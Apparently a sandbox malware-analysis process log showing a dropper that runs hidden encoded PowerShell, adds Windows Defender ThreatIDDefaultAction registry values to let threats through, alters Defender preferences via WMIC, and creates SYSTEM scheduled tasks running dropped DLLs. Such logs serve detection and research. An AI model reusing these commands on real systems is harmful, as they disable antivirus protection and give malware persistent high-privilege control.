C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2704 -ip 27041⤵
-
C:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\SQNfYWE.exeC:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\SQNfYWE.exe xj /WqJVdidMj 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhpuaaonuqVoelUvgo"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\lwqGFNNkU\FzgPyW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "hiXTHRxmBfdbKAP" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hiXTHRxmBfdbKAP2" /F /xml "C:\Program Files (x86)\lwqGFNNkU\nTYAyEh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hiXTHRxmBfdbKAP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hiXTHRxmBfdbKAP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jONrbUXsZlWKUm" /F /xml "C:\Program Files (x86)\ooaqkSSxqGyU2\LjJmSjx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guPXcpPQgOYTm2" /F /xml "C:\ProgramData\rNTGojywzibeDzVB\PoGYhXz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hGXSKRwbDLnsnXXXt2" /F /xml "C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\FxxkLyy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IMufzQmGSuwZQsmFOOn2" /F /xml "C:\Program Files (x86)\VsVHNYITDnqCC\FiTHmnP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jAFDOjCXGMQClUYnP" /SC once /ST 15:29:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TvSdAjXLYNsucLRI\SnvbayQF\ggmuDdF.dll\",#1 /MdidN 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jAFDOjCXGMQClUYnP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ltbOwrqBWDKUbrYld"2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSF453.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSF453.tmp\Install.exe cY /lDRdidQrKT 525403 /S1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ltbOwrqBWDKUbrYld" /SC once /ST 07:19:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\vrXeRMO.exe\" xj /GxBkdidHP 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ltbOwrqBWDKUbrYld"2⤵
-
C:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\vrXeRMO.exeC:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\vrXeRMO.exe xj /GxBkdidHP 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
